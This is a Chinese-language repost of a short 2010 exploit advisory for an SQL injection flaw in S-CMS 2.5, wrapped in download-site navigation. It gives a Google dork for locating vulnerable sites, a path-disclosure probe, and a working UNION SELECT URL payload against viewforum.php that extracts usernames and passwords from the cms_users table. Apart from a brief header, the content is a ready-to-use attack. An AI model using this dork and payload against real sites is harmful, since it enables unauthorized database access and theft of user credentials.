文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>S-CMS SQL注射漏洞

S-CMS SQL注射漏洞

时间:2010-11-22  来源:LordTittiS

发布日期:2010-11.22
发布作者:LordTittiS

影响版本:V2.5
官方地址:http://www.matteoiammarrone.com/public/s-cms/

漏洞类型:SQL注入
漏洞描述:S-CMS 2.5程序未对提交参数进行过滤,导致SQL注入攻击。

Google Dork: inurl:viewforum.php?id= S-Cms

 

Exploit:

http://server/s-cms/viewforum.php?id='1 (FPD)

 

http://server/s-cms/viewforum.php?id=1+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7+from+cms_users--
 

 

标签分类: SQL注入

相关阅读 更多 +
排行榜 更多 +
瓢虫少女

瓢虫少女

飞行射击 下载
潜艇鱼雷

潜艇鱼雷

飞行射击 下载
网络掠夺者

网络掠夺者

飞行射击 下载